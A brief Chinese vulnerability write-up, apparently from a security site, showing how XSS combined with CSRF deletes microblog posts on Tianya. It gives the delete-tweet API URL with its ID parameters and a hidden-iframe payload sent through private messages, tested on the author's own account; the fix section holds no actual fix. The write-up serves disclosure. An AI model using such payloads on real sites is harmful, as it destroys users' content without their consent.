这次我们来看看如何利用XSS结合CSRF打造定向攻击 再来看一下上次(http://www.2cto.com/Article/201310/248998.html)的文件引发的又一个问题 首先抓包拿到删除微博的URL http://www.tianya.cn/api/tw?method=tweet.ice.deleteTweetparams.id=0000000params.d
再来看一下上次(http://www.2cto.com/Article/201310/248998.html)的文件引发的又一个问题
首先抓包拿到删除微博的URL
http://www.tianya.cn/api/tw?method=tweet.ice.deleteTweet¶ms.id=0000000¶ms.delUserId=0000000
params.id 代表微博的ID
params.delUserId 代表所属帐号的ID
首先拿我自己做测试,我先发表一条微博

然后找到该条微博的ID

找到用户的ID

来到发送消息的页面

构造如下恶意代码:
<iframe style='display:none' src='http://www.tianya.cn/api/tw?method=tweet.ice.deleteTweet¶ms.id=68541413¶ms.delUserId=82776194' >
发送之后,我们查看源码

这时 CSRF+XSS 已经攻击成功,回到首页查看,微博已没。
修复方案:
幸苦你们了
幸苦你们了